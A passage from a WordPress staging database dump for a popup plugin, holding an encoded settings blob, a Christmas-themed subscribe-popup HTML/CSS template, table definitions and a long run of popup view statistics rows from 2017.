lbV9wdWRfa2V5IjtzOjA6IiI7czoxNjoic3ViX21lbV9wcml2X2tleSI7czowOiIiO3M6MTQ6InN1Yl9zYl9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX3Y2X2FwaV9rZXkiO3M6MDoiIjtzOjEyOiJzdWJfdnRpZ191cmwiO3M6MDoiIjtzOjEzOiJzdWJfdnRpZ19uYW1lIjtzOjA6IiI7czoxMjoic3ViX3Z0aWdfa2V5IjtzOjA6IiI7czoxNjoic3ViX3ltbHBfYXBpX2tleSI7czowOiIiO3M6MTM6InN1Yl95bWxwX25hbWUiO3M6MDoiIjtzOjExOiJzdWJfNGRfbmFtZSI7czowOiIiO3M6MTE6InN1Yl80ZF9wYXNzIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Njp7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjExOiJZb3VyIGUtbWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIzOiJFbXB0eSAgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6MzU6IllFUywgSSB3YW50IHRvIGdldCBtb3JlIFN1YnNjcmliZXJzIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19zdWJqZWN0IjtzOjI5OiJOZXcgc3Vic2NyaWJlciBmb3IgW3NpdGVuYW1lXSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSBpcyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjg6ImxvZ2luX2J5IjtzOjg6InVzZXJuYW1lIjtzOjE4OiJsb2dpbl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjE1OiJsb2dpbl9idG5fbGFiZWwiO3M6MTA6ItCb0L7Qs9C40L0iO3M6MjM6InJlZ193cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjEzOiJyZWdfYnRuX2xhYmVsIjtzOjg6IlJlZ2lzdGVyIjtzOjEwOiJyZWdfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6Njoi0JjQvNGPIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjE5NToi0KHRgdGL0LvQutCwINC00LvRjyDQv9C+0LTRgtCy0LXRgNC20LTQtdC90LjRjyDQsdGL0Lsg0L7RgtC/0YDQsNCy0LvQtdC90LAg0L3QsCDQstCw0Ygg0LDQtNGA0LXRgSDRjdC70LXQutGC0YDQvtC90L3QvtC5INC/0L7Rh9GC0YsuINCf0YDQvtCy0LXRgNGM0YLQtSDQstCw0YjRgyDRjdC70LXQutGC0YDQvtC90L3Rg9GOINC/0L7Rh9GC0YMhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6NDM6ItCh0L/QsNGB0LjQsdC+INC30LAg0YDQtdCz0LjRgdGC0YDQsNGG0LjRjiEiO3M6MjE6InJlZ190eHRfaW52YWxpZF9lbWFpbCI7czo1ODoi0J/Rg9GB0YLQvtC5INC40LvQuCDQvdC10LTQtdC50YHRgtCy0LjRgtC10LvRjNC90YvQuSBlbWFpbCI7czoxNjoicmVnX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6NjE6ItCf0L7QtNGC0LLQtdGA0LTQuNGC0LUg0YDQtdCz0LjRgdGC0YDQsNGG0LjRjiDQvdCwIFtzaXRlbmFtZV0iO3M6MjU6InJlZ190eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjMzNDoi0JLRiyDQt9Cw0YDQtdCz0LjRgdGC0YDQuNGA0L7QstCw0L3RiyDQvdCwINGB0LDQudGC0LUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiDQodC70LXQtNGD0LnRgtC1ICA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+INC00LvRjyDQt9Cw0LLQtdGA0YjQtdC90LjRjyDRgNC10LPQuNGB0YLRgNCw0YbQuNC4LiDQldGB0LvQuCDQstGLINC90LUg0LfQsNGA0LXQs9C40YHRgtGA0LjRgNC+0LLQsNC70LjRgdGMINC30LTQtdGB0YwgLSDQv9GA0L7RgdGC0L4g0LjQs9C90L7RgNC40YDRg9C50YLQtSDRjdGC0L4g0YHQvtC+0LHRidC10L3QuNC1LiI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czo0NToiW3NpdGVuYW1lXSAg0JLQsNGIINC70L7Qs9C40L0g0Lgg0L/QsNGA0L7Qu9GMIjtzOjI4OiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo3MToi0JvQvtCz0LjQvTogW3VzZXJfbG9naW5dPGJyIC8+0J/QsNGA0L7Qu9GMOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MTM6InJlZ19uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJyZWdfbmV3X21lc3NhZ2UiO3M6MTc3OiLQoyDQstCw0YEg0L3QvtCy0YvQuSDQv9C+0LvRjNC30L7QstCw0YLQtdC70Ywg0L3QsCDRgdCw0LnRgtC1IDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwg0LLQvtGCINC40L3RhNC+0YDQvNCw0YbQuNGPINC/0L7Qu9GM0LfQvtCy0LDRgtC10LvRjzogPGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6MTI6InN0YXRfZ2FfY29kZSI7czowOiIiO3M6NToidHh0XzAiO3M6MTIzOiI8cD5EbyBZb3UgV2FudCBUbzxzdHJvbmc+IEluY3JlYXNlPC9zdHJvbmc+IDxiciAvPllvdXIgU3Vic2NyaWJlcnMgPGJyIC8+PHN0cm9uZz5VcCBUbyA3MDAlPC9zdHJvbmc+IDxzdHJvbmc+Pzwvc3Ryb25nPjwvcD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjQiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMSI7fX0=','<link href=\"https://fonts.googleapis.com/css?family=Alex+Brush|Josefin+Sans\" rel=\"stylesheet\">\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div class=\"ppsWrapTopImg\">\r\n				[if enb_label]\r\n					<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				[endif]\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n					[txt_0]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[if enb_foot_note]\r\n						<a href=\"#\" class=\"ppsFootNote ppsPopupClose\">\r\n						[foot_note]\r\n						</a>\r\n					[endif]\r\n					\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_sm]\r\n				<div style=\"clear: both;\"></div>\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: arial;\r\n	font-size: 13px;\r\n	font-weight: normal;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n	[if bg_type_0 == \"color\"]\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\", endColorstr=\"[bg_color_0]\",GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \"img\"]\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	\r\n	position: relative;\r\n	text-align: center;\r\n	padding: 0 0 40px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsWrapTopImg {\r\n	[if bg_type_1 == \"color\"]\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\", endColorstr=\"[bg_color_1]\",GradientType=1 ); /* ie6-9 */\r\n	[elseif bg_type_1 == \"img\"]\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-position: center bottom;\r\n    background-repeat: no-repeat;\r\n    background-size: cover;\r\n  	[endif]\r\n	\r\n	min-height: 210px;\r\n    padding: 40px 0 85px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell{\r\n    display: inline-block;\r\n    margin: 0;\r\n	position: relative;\r\n	z-index: 100;\r\n	width: 90%;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	position: relative;\r\n	padding: 5px 0;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input {\r\n	width: 100%;\r\n	-webkit-border-radius: 0px;\r\n	-moz-border-radius: 0px;\r\n	border-radius: 0px;\r\n	border: 0 solid transparent;\r\n	height: 47px;\r\n	padding: 0;\r\n	margin: 0;\r\n	display:block;\r\n	font-family: arial;\r\n	text-align: center;\r\n}\r\n\r\n/*For all Elements*/\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	border: 1px solid #01a2ea;\r\n    color: #777777;\r\n    font-size: 18px;\r\n	font-family: arial;\r\n	font-weight: normal;\r\n    height: 45px;\r\n    padding: 0 20px;\r\n	width: 100%;\r\n	display:block;\r\n	text-align: center;\r\n	margin-top: 10px;\r\n	\r\n	[if bg_type_2 == \"color\"]\r\n	background: [bg_color_2];\r\n  	[elseif bg_type_2 == \"img\"]\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	margin-top: 0px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeForm input:first-child {\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select  {\r\n\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  {\r\n	font-size: 18px;\r\n	font-family: arial;\r\n	font-weight: normal;\r\n	margin-top: 10px;\r\n	display:block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  span {\r\n	display: inline-block;\r\n	padding-right: 2px;\r\n	vertical-align: middle;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=radio],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=checkbox] {\r\n	vertical-align: middle;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email] {\r\n	border: 1px solid #01a2ea;\r\n    color: #777777;\r\n    font-size: 18px;\r\n    height: auto;\r\n    padding: 20px 20px 50px;\r\n	margin-top: 10px;\r\n	\r\n	[if bg_type_2 == \"color\"]\r\n	background: [bg_color_2];\r\n  	[elseif bg_type_2 == \"img\"]\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border: 10px solid #fff;\r\n  	color: #333333;\r\n  	cursor: pointer;\r\n	font-weight: 600;\r\n	font-size: 20px;\r\n	height: auto;\r\n	display: inline-block;\r\n	padding: 15px 0 13px;\r\n	bottom: 65px;\r\n	\r\n	-webkit-border-radius: 20px;\r\n	-moz-border-radius: 20px;\r\n	border-radius: 20px;\r\n	position: absolute;\r\n    text-transform: none;\r\n	left: 5%;\r\n    width: 90%;\r\n	\r\n	[if bg_type_3 == \"color\"]\r\n	background: [bg_color_3] !important;\r\n  	[elseif bg_type_3 == \"img\"]\r\n  	background-image: url(\"[bg_img_3]\") !important;\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email]::-webkit-input-placeholder { /* Chrome/Opera/Safari */\r\n    color: #999999;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email]::-moz-placeholder { /* Firefox 19+ */\r\n    color: #999999;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email]:-ms-input-placeholder { /* IE 10+ */\r\n    color: #999999;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email]:-moz-placeholder { /* Firefox 18- */\r\n    color: #999999;\r\n}\r\n\r\n\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	font-family: arial;\r\n	font-size: 35px;\r\n	padding: 20px 20px 0; \r\n	text-align: center;\r\n	line-height: 45px;\r\n	position: relative;\r\n	z-index: 100;\r\n	color: #fff;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt {\r\n	font-family: arial;\r\n	margin: 0;\r\n	padding: 0;\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt p {\r\n	display: inline-block;\r\n    margin: 0;\r\n    padding: 0;\r\n    width: 90%;\r\n	position: relative;\r\n	z-index: 100;\r\n	word-wrap: break-word;\r\n	line-height: 50px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n    color: #fff;\r\n    font-size: 53px;\r\n    line-height: 50px;\r\n    margin: 10px 0;\r\n	text-shadow: 2px 2px 0 #01a2ea;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] + .ppsFootNote {\r\n	display: inline-block !important;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n	-webkit-border-radius: 10px;\r\n	-moz-border-radius: 10px;\r\n	border-radius: 10px;\r\n	\r\n	background: none !important;\r\n	border: 2px solid #cbcbcb;\r\n    color: #cbcbcb;\r\n    display: none !important;\r\n    font-size: 16px;\r\n	font-weight: bold;\r\n    height: auto !important;\r\n    margin: 60px 30px 0;\r\n	padding: 5px 20px;\r\n    position: static !important;\r\n    text-decoration: none;\r\n    top: 0 !important;\r\n    width: auto !important;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n	z-index: 1000 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg{\r\n	clear: both;\r\n  	text-align: center;\r\n}\r\n','christmas-3-prev.png',1,1,1,11,0,0,0,'2015-01-10 17:59:43',49,0);
/*!40000 ALTER TABLE `wpstg0_pps_popup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_pps_popup_show_categories`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_pps_popup_show_categories` (
  `popup_id` int(10) NOT NULL,
  `term_id` int(10) NOT NULL,
  `not_show` tinyint(1) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_pps_popup_show_categories`
--

LOCK TABLES `wpstg0_pps_popup_show_categories` WRITE;
/*!40000 ALTER TABLE `wpstg0_pps_popup_show_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpstg0_pps_popup_show_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_pps_popup_show_pages`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_pps_popup_show_pages` (
  `popup_id` int(10) NOT NULL,
  `post_id` int(10) NOT NULL,
  `not_show` tinyint(1) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_pps_popup_show_pages`
--

LOCK TABLES `wpstg0_pps_popup_show_pages` WRITE;
/*!40000 ALTER TABLE `wpstg0_pps_popup_show_pages` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpstg0_pps_popup_show_pages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_pps_statistics`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_pps_statistics` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `popup_id` int(11) NOT NULL DEFAULT '0',
  `type` tinyint(2) NOT NULL DEFAULT '0',
  `sm_id` tinyint(2) NOT NULL DEFAULT '0',
  `is_unique` tinyint(1) NOT NULL DEFAULT '0',
  `date_created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=744 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_pps_statistics`
--

LOCK TABLES `wpstg0_pps_statistics` WRITE;
/*!40000 ALTER TABLE `wpstg0_pps_statistics` DISABLE KEYS */;
INSERT INTO `wpstg0_pps_statistics` VALUES (1,100,1,0,1,'2017-11-07 14:14:48'),(2,100,1,0,0,'2017-11-07 14:17:34'),(3,100,1,0,0,'2017-11-07 14:18:22'),(4,100,1,0,0,'2017-11-07 14:18:35'),(5,100,8,0,0,'2017-11-07 14:19:21'),(6,100,1,0,0,'2017-11-07 14:19:30'),(7,100,1,0,0,'2017-11-07 14:20:58'),(8,100,1,0,0,'2017-11-07 14:23:58'),(9,100,1,0,1,'2017-11-07 14:24:46'),(10,100,8,0,0,'2017-11-07 14:26:00'),(11,100,1,0,0,'2017-11-07 14:26:05'),(12,100,8,0,0,'2017-11-07 14:26:11'),(13,100,1,0,0,'2017-11-07 14:26:19'),(14,100,1,0,1,'2017-11-09 10:39:00'),(15,100,1,0,0,'2017-11-09 10:39:07'),(16,100,8,0,0,'2017-11-09 10:39:22'),(17,100,1,0,0,'2017-11-09 10:39:59'),(18,100,1,0,0,'2017-11-09 10:40:38'),(19,100,1,0,1,'2017-11-09 10:48:33'),(20,100,8,0,0,'2017-11-09 10:48:38'),(21,100,1,0,0,'2017-11-09 10:49:02'),(22,100,1,0,0,'2017-11-09 10:54:18'),(23,100,8,0,0,'2017-11-09 10:54:27'),(24,100,1,0,1,'2017-11-09 11:20:42'),(25,100,1,0,1,'2017-11-09 11:35:15'),(26,100,1,0,1,'2017-11-09 11:39:15'),(27,100,8,0,0,'2017-11-09 11:39:22'),(28,100,1,0,1,'2017-11-09 11:41:57'),(29,100,8,0,0,'2017-11-09 11:42:00'),(30,100,1,0,0,'2017-11-09 11:46:48'),(31,100,8,0,0,'2017-11-09 11:48:26'),(32,100,1,0,1,'2017-11-09 12:10:41'),(33,100,1,0,1,'2017-11-09 12:19:20'),(34,100,8,0,0,'2017-11-09 12:19:30'),(35,100,1,0,1,'2017-11-09 12:33:30'),(36,100,8,0,0,'2017-11-09 12:33:34'),(37,100,1,0,1,'2017-11-09 12:39:55'),(38,100,1,0,1,'2017-11-09 12:55:48'),(39,100,8,0,0,'2017-11-09 12:55:53'),(40,100,1,0,1,'2017-11-09 13:22:11'),(41,100,8,0,0,'2017-11-09 13:22:17'),(42,100,1,0,1,'2017-11-09 13:34:57'),(43,100,1,0,1,'2017-11-09 14:04:02'),(44,100,8,0,0,'2017-11-09 14:04:11'),(45,100,1,0,1,'2017-11-09 14:04:18'),(46,100,8,0,0,'2017-11-09 14:04:46'),(47,100,1,0,1,'2017-11-09 14:11:03'),(48,100,8,0,0,'2017-11-09 14:11:05'),(49,100,1,0,0,'2017-11-09 14:11:25'),(50,100,8,0,0,'2017-11-09 14:11:29'),(51,100,1,0,0,'2017-11-09 14:11:32'),(52,100,8,0,0,'2017-11-09 14:11:51'),(53,100,1,0,1,'2017-11-09 14:16:39'),(54,100,8,0,0,'2017-11-09 14:16:44'),(55,100,1,0,1,'2017-11-09 14:19:07'),(56,100,8,0,0,'2017-11-09 14:19:21'),(57,100,1,0,0,'2017-11-09 14:20:00'),(58,100,8,0,0,'2017-11-09 14:20:03'),(59,100,1,0,1,'2017-11-09 14:24:39'),(60,100,1,0,1,'2017-11-09 14:29:52'),(61,100,1,0,1,'2017-11-09 14:45:09'),(62,100,8,0,0,'2017-11-09 14:45:22'),(63,100,1,0,1,'2017-11-09 14:48:56'),(64,100,1,0,1,'2017-11-09 15:25:22'),(65,100,8,0,0,'2017-11-09 15:28:26'),(66,100,1,0,0,'2017-11-09 15:33:58'),(67,100,8,0,0,'2017-11-09 15:34:31'),(68,100,1,0,0,'2017-11-09 15:35:25'),(69,100,1,0,1,'2017-11-09 15:35:39'),(70,100,8,0,0,'2017-11-09 15:35:42'),(71,100,1,0,1,'2017-11-09 16:00:59'),(72,100,8,0,0,'2017-11-09 16:01:02'),(73,100,1,0,1,'2017-11-09 16:09:36'),(74,100,8,0,0,'2017-11-09 16:09:39'),(75,100,1,0,0,'2017-11-09 16:12:42'),(76,100,8,0,0,'2017-11-09 16:13:02'),(77,100,1,0,1,'2017-11-09 16:35:24'),(78,100,8,0,0,'2017-11-09 16:35:32'),(79,100,1,0,1,'2017-11-09 17:15:42'),(80,100,8,0,0,'2017-11-09 17:16:09'),(81,100,1,0,1,'2017-11-09 17:18:31'),(82,100,8,0,0,'2017-11-09 17:20:09'),(83,100,1,0,1,'2017-11-09 17:25:32'),(84,100,8,0,0,'2017-11-09 17:27:50'),(85,100,1,0,1,'2017-11-09 17:37:18'),(86,100,8,0,0,'2017-11-09 17:39:41'),(87,100,1,0,1,'2017-11-09 18:02:55'),(88,100,8,0,0,'2017-11-09 18:04:34'),(89,100,1,0,1,'2017-11-09 